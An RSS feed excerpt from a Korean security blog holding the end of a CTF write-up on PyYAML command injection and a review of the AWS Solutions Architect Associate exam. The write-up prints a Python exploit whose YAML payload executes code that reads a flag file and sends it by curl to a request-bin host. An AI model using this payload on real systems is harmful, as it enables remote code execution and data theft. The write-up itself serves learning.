&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;또한 서버의 응답 헤더를 확인해 봤을때&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;Python 을 이용해 구동중인 것을 확인했다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;이 부분은 문제푸는데 정신이 없어서 캡쳐를 제대로 하지 못했다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #555555; text-align: start;&quot;&gt;아무튼 그래서 PyYAML을 이용한 yaml command injection 을 시도해봤다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;pre id=&quot;code_1712673044439&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;import requests
import base64

url = 'http://3.39.253.212'

payload = '''
- !!python/object/new:tuple [!!python/object/new/map [!!python/name:eval , [
    'exec(&quot;import os; f=open(\\&quot;/app/flag\\&quot;).read();os.system(\\&quot;curl
    http://requestbin주소?a=\\&quot;+f)&quot;)' ]]]
'''

payload = base64.b64encode(payload.encode())
data = []

for a in payload:
	data.append(c ^ 50)
data = bytes(data)

r = requests.post(url, data=dict(y=data))
print(r.text)&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이런식으로&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;플래그의 위치인 /app/flag 의 내용을 읽어와서&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;curl 로 해당 내용을 a 파라미터에 담아 전송토록 했다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;base64 인코딩하고 50으로 xor 한것은&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;문제에서 동작하는 악성코드가 yaml 데이터를 보낼때&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이런식으로 보내고 있었기 때문에 양식을 맞춘것이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;585&quot; data-origin-height=&quot;62&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/zp9nX/btsGwQu0qKZ/ejGcTnkQAlUkrmco2pWXdk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/zp9nX/btsGwQu0qKZ/ejGcTnkQAlUkrmco2pWXdk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/zp9nX/btsGwQu0qKZ/ejGcTnkQAlUkrmco2pWXdk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fzp9nX%2FbtsGwQu0qKZ%2FejGcTnkQAlUkrmco2pWXdk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;585&quot; height=&quot;62&quot; data-origin-width=&quot;585&quot; data-origin-height=&quot;62&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;그럼 이런식으로 /app/flag 이 base64 인코딩된 값으로 따라오는걸 볼 수 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;806&quot; data-origin-height=&quot;40&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cJwx4G/btsGvrb0bW4/hoNQtmMvNfnOmFxNqKrdC0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cJwx4G/btsGvrb0bW4/hoNQtmMvNfnOmFxNqKrdC0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cJwx4G/btsGvrb0bW4/hoNQtmMvNfnOmFxNqKrdC0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcJwx4G%2FbtsGvrb0bW4%2FhoNQtmMvNfnOmFxNqKrdC0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;806&quot; height=&quot;40&quot; data-origin-width=&quot;806&quot; data-origin-height=&quot;40&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당 값을 base64 디코딩해주면&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;플래그를 찾을 수 있다.&lt;/p&gt;</description>
      <category>CTF/웹해킹</category>
      <category>CTF</category>
      <category>WEB</category>
      <category>YAML command injection</category>
      <category>사이버</category>
      <category>워게임</category>
      <category>웹해킹</category>
      <category>정보보안</category>
      <category>정보보호</category>
      <category>해킹</category>
      <category>해킹대회</category>
      <author>SecurityMan</author>
      <guid isPermaLink="true">https://hackingstudypad.tistory.com/722</guid>
      <comments>https://hackingstudypad.tistory.com/722#entry722comment</comments>
      <pubDate>Wed, 10 Apr 2024 11:00:21 +0900</pubDate>
    </item>
    <item>
      <title>[AWS Certified Solutions Architect - Associate] 시험정보 / 후기 / 공부방법</title>
      <link>https://hackingstudypad.tistory.com/721</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;edited_21. AWS Certified Solutions Architect - Associate certificate.PNG&quot; data-origin-width=&quot;1051&quot; data-origin-height=&quot;803&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cwgFBZ/btsGc5A36Ql/TJBMkdwPdm5C2R9rVDX1Ak/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cwgFBZ/btsGc5A36Ql/TJBMkdwPdm5C2R9rVDX1Ak/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cwgFBZ/btsGc5A36Ql/TJBMkdwPdm5C2R9rVDX1Ak/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcwgFBZ%2FbtsGc5A36Ql%2FTJBMkdwPdm5C2R9rVDX1Ak%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;504&quot; height=&quot;385&quot; data-filename=&quot;edited_21. AWS Certified Solutions Architect - Associate certificate.PNG&quot; data-origin-width=&quot;1051&quot; data-origin-height=&quot;803&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2024년 3월 취득한 AWS Certified Solutions Architect - Associate 자격증(SAA-C03)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000; text-align: start;&quot;&gt; AWS Cloud Practitioner 를 취득한 후 대략 1년 반 뒤에 취득했다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000; text-align: start;&quot;&gt;해당 자격증은 AWS 에서 주관하고 있는 AWS 클라우드 관련 자격증이다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;revenue_unit_wrap&quot;&gt;
  &lt;div class=&quot;revenue_unit_item adsense responsive&quot;&gt;
    &lt;div class=&quot;revenue_unit_info&quot;&gt;반응형&lt;/div&gt;
    &lt;script src=&quot;//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js&quot; async=&quot;async&quot;&gt;&lt;/script&gt;
    &lt;ins class=&quot;adsbygoogle&quot; style=&quot;display: block;&quot; data-ad-host=&quot;ca-host-pub-9691043933427338&quot; data-ad-client=&quot;ca-pub-6369827649108732&quot; data-ad-format=&quot;auto&quot;&gt;&lt;/ins&gt;
    &lt;script&gt;(adsbygoogle = window.adsbygoogle || []).push({});&lt;/script&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;955&quot; data-origin-height=&quot;770&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/qK3XF/btsGetAU5MP/JAKMGm318bskRCi1p4TGk1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/qK3XF/btsGetAU5MP/JAKMGm318bskRCi1p4TGk1/img.png&quot; data-alt=&quot;AWS 홈페이지 :&amp;amp;amp;nbsp;https://aws.amazon.com/ko/certification/?nc2=sb_ce_co&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/qK3XF/btsGetAU5MP/JAKMGm318bskRCi1p4TGk1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FqK3XF%2FbtsGetAU5MP%2FJAKMGm318bskRCi1p4TGk1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;589&quot; height=&quot;475&quot; data-origin-width=&quot;955&quot; data-origin-height=&quot;770&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;AWS 홈페이지 :&amp;amp;nbsp;https://aws.amazon.com/ko/certification/?nc2=sb_ce_co&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;AWS 에서 주관하는 자격증이 총 12개가 있는데&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;Cloud Practitioner 는 그중 가장 쉬운 난이도의 자격증이고,&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;그것보다 한단계 위인 ASSOCIATE 레벨의 자격증 중&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;Solutions Architect 분야의 자격이다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;시험은 총 130분간 온라인으로 치뤄지고,&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;한번 응시하는데 150달러가 든다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;총 65개 문항으로 구성되어 있으며, 모두 객관식이고&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;기본적으로 4지선다인데 복수정답을 선택하는 문제가 일부 섞여있다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;2개를 선택하면 보기가 5개, 3개를 선택하면 보기가 6개 나온다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc; background-color: #ffffff; color: #333333; text-align: start;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;컴퓨팅, 네트워킹, 스토리지 및 데이터베이스 AWS 서비스는 물론, AWS 배포 및 관리 서비스에 대한 지식과 기술&lt;/li&gt;
&lt;li&gt;AWS에서 워크로드를 배포, 관리, 운영한 경험과 보안 제어 및 규정 준수 요구 사항 구현에 대한 지식과 기술&lt;/li&gt;
&lt;li&gt;AWS Management Console 및 AWS Command Line Interface(CLI) 사용에 대한 지식 및 기술과 AWS Well-Architected Framework, AWS 네트워킹, 보안 서비스 및 AWS 글로벌 인프라에 대한 이해&lt;/li&gt;
&lt;li&gt;주어진 기술 요구 사항에 부합하는 AWS 서비스를 식별하고 AWS 기반 애플리케이션의 기술 요구 사항을 정의하는 능력&lt;/li&gt;
&lt;/ul&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;AWS Certified Solutions Architect - Associate 는 위의 내용들을 검증한다.&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 66.5116%; height: 236px;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;도메인&lt;/td&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;시험비율&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;보안 아키텍처 설계&lt;/td&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;30%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;복원력을 갖춘 아키텍처 설계&lt;/td&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;26%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;고성능 아키텍처 설계&lt;/td&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;24%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;비용에 최적화된 아키텍처 셜계&lt;/td&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;20%&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;시험에 나오는 도메인은 위와 같이 크게 4가지로 나누어진다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;시험 결과는 100 ~ 1,000 기준의 점수로 채점이 되고,&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;이중&lt;/span&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;&lt;b&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;720점&lt;/b&gt;&lt;/span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #000000;&quot;&gt;이상을 획득해야 시험에 합격할 수 있다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1164&quot; data-origin-height=&quot;378&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/mvVIe/btsGc5A4hRw/4dfwVzT6GWYlb86JEV2Ju0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/mvVIe/btsGc5A4hRw/4dfwVzT6GWYlb86JEV2Ju0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/mvVIe/btsGc5A4hRw/4dfwVzT6GWYlb86JEV2Ju0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FmvVIe%2FbtsGc5A4hRw%2F4dfwVzT6GWYlb86JEV2Ju0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1164&quot; height=&quot;378&quot; data-origin-width=&quot;1164&quot; data-origin-height=&quot;378&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이번에 공부할때도 역시&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;인프런에서 코드바나나님의&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #ffffff; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;&lt;b&gt;AWS Certified Solutions Architect - Associate 자격증 준비하기&lt;/b&gt; 강의를 들었다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #ffffff; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;14만원에 올라와 있는데&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #ffffff; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;연초에 할인을 엄청나게 하길래 바로 질러서 들었다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #ffffff; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #ffffff; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;인강을 들으면서 직접 AWS에서 관련 서비스를 따라 구성해보면서 들으니&lt;/span&gt;&lt;span style=&quot;color: #000000;&quot;&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #ffffff; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;이해도 확실히 더 잘됐된것 같다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #ffffff; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #ffffff; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;무엇보다 예상문제가 많이 제공되는데, 그걸 풀이하는 방법까지 자세하게 설명해주셔서 너무 좋았다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #ffffff; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;AWS 시험 문제가 정답을 찾는 패턴 같은게 있는데&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #ffffff; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;(문제에 이런 문구가 나오면 이게 답이다 같은..)&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #ffffff; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;강의를 반복해서 듣다보면 그걸 찾을 수 있는 능력이 키워진는것 같다.&lt;/span&gt;&lt;span style=&quot;color: #000000;&quot;&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;제공된 문제 중 동일한 문제도 몇개 시험에 똑같이 나와서 조금 수월했던것 같다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #ffffff; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;하지만 지난 AWS Cloud Practicioner 와 달리&lt;/span&gt;&lt;span style=&quot;color: #000000;&quot;&gt;이 강의에서 제공된 문제만으로는 한계가 있다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #ffffff; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #000000;&quot;&gt;&lt;a href=&quot;https://explore.skillbuilder.aws/learn/course/external/view/elearning/13363/aws-certified-solutions-architect-associate-practice-question-set-saa-c03-korean?saa=sec&amp;amp;sec=prep&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://explore.skillbuilder.aws/learn/course/external/view/elearning/13363/aws-certified-solutions-architect-associate-practice-question-set-saa-c03-korean?saa=sec&amp;amp;sec=prep&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1711890794187&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;Self-paced digital training on AWS - AWS Skill Builder&quot; data-og-description=&quot;Your learning center to build in-demand cloud skills. Skill Builder provides 500+ free digital courses, 25+ learning plans, and 19 Ramp-Up Guides to help you expand your knowledge. Courses cover more than 30 AWS solutions for various skill levels. Skill Bu&quot; data-og-host=&quot;explore.skillbuilder.aws&quot; data-og-source-url=&quot;https://explore.skillbuilder.aws/learn/course/external/view/elearning/13363/aws-certified-solutions-architect-associate-practice-question-set-saa-c03-korean?saa=sec&amp;amp;sec=prep&quot; data-og-url=&quot;https://explore.skillbuilder.aws/learn/course/external/view/elearning/13363/aws-certified-solutions-architect-associate-practice-question-set-saa-c03-korean?saa=sec&amp;amp;sec=prep&quot; data-og-image=&quot;&quot;&gt;&lt;a href=&quot;https://explore.skillbuilder.aws/learn/course/external/view/elearning/13363/aws-certified-solutions-architect-associate-practice-question-set-saa-c03-korean?saa=sec&amp;amp;sec=prep&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://explore.skillbuilder.aws/learn/course/external/view/elearning/13363/aws-certified-solutions-architect-associate-practice-question-set-saa-c03-korean?saa=sec&amp;amp;sec=prep&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url();&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;Self-paced digital training on AWS - AWS Skill Builder&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;Your learning center to build in-demand cloud skills. Skill Builder provides 500+ free digital courses, 25+ learning plans, and 19 Ramp-Up Guides to help you expand your knowledge. Courses cover more than 30 AWS solutions for various skill levels. Skill Bu&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;explore.skillbuilder.aws&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;a href=&quot;https://d1.awsstatic.com/ko_KR/training-and-certification/docs-sa-assoc/AWS-Certified-Solutions-Architect-Associate_Sample-Questions.pdf&quot;&gt;https://d1.awsstatic.com/ko_KR/training-and-certification/docs-sa-assoc/AWS-Certified-Solutions-Architect-Associate_Sample-Questions.pdf&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;아무래도 한정된 강의에서 모든 문제 유형을 다루긴 힘들기 때문일 것인데,&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;보완하기 위해 AWS에서 제공하는 샘플문항과 공식 연습문제 집합을 풀어보는것이 도움이 된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;그리고 구글에 검색하면 나오는덤프들...&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;아직 C03 덤프는 많이 없는것 같고 C02 덤프를 쉽게 찾을 수 있는데&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;C02로 공부해도 개념을 이해하고 있다면 크게 문제는 없는것 같다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;다만 덤프기 때문에 거기 써있는 정답을 확신하지 말고 비판적으로 봐야한다는것..&lt;/p&gt;
